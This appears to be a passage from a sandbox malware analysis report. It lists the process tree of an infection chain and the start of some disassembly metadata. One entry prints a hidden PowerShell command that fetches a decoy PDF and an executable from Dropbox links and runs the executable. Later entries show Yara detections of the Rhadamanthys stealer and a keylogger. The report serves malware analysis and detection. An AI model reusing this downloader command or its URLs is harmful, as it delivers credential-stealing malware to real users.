                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                                                                        Start time:12:40:23
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2088,i,4290676107445022345,3806009020306178634,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                        Start time:12:40:23
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                                                        Start time:12:40:23
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                                                        Start time:12:40:27
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\697963187.bat" "
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7000d0000
                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                                                                        Start time:12:40:27
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                                                                        Start time:12:40:27
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                                                                                                        Start time:12:40:29
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                                                                        Start time:12:40:29
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6808 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                                                                                        Start time:12:40:30
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                                        File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                                                                                        Start time:12:40:30
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                                        File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                                                                        Start time:12:40:35
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1225428425.pdf
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                                                                        Start time:12:40:35
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7388 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                                                                                        Start time:12:40:37
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2108,i,10734861475087244222,18214222288503595443,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                                                                        Start time:12:40:38
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8888 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:6
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                                                                        Start time:12:40:44
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1718218388.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1718218388.exe"
                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                        File size:2'764'800 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:DFED8A8BF0531716FD932A0A81CB14CD
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                                        • Detection: 55%, ReversingLabs
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                                                                        Start time:12:41:02
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1718218388.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1718218388.exe"
                                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                        File size:2'764'800 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:DFED8A8BF0531716FD932A0A81CB14CD
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001C.00000003.2716353385.0000000000A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000003.2719902686.0000000003170000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001C.00000003.2719658263.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001C.00000002.2726552548.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                                                                                                        Start time:12:41:03
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\fontdrvhost.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                                                        Imagebase:0x490000
                                                                                                                                                                                                                                                                                                                        File size:676'584 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001D.00000002.2843630378.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000003.2725119697.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000001D.00000003.2721019317.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001D.00000003.2724535422.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                                                                        Start time:12:41:04
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 432
                                                                                                                                                                                                                                                                                                                        Imagebase:0x4d0000
                                                                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                                                                        Start time:12:41:15
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7d9200000
                                                                                                                                                                                                                                                                                                                        File size:827'408 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                                                                        Start time:12:41:19
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 5688 -s 136
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff786a00000
                                                                                                                                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                                                                        Start time:12:41:23
                                                                                                                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6816 --field-trial-handle=2040,i,3577618979646503698,5482809311982956189,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                        MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                          Function 00007FFD348933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2489021120.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ffd34890000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                                                          • Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41

                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                          Function 00007FFD34894CAA Relevance: .8, Instructions: 835COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2489021120.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_7ffd34890000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6ae0708ae5454aa953c525b16e2a3ddada624e4fd92bc6ed5fe5fef5895dc01c
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 00c6b70e540766d4c44ce4f1f1116687e759021b97fe1c6e7fba00187e07a7de
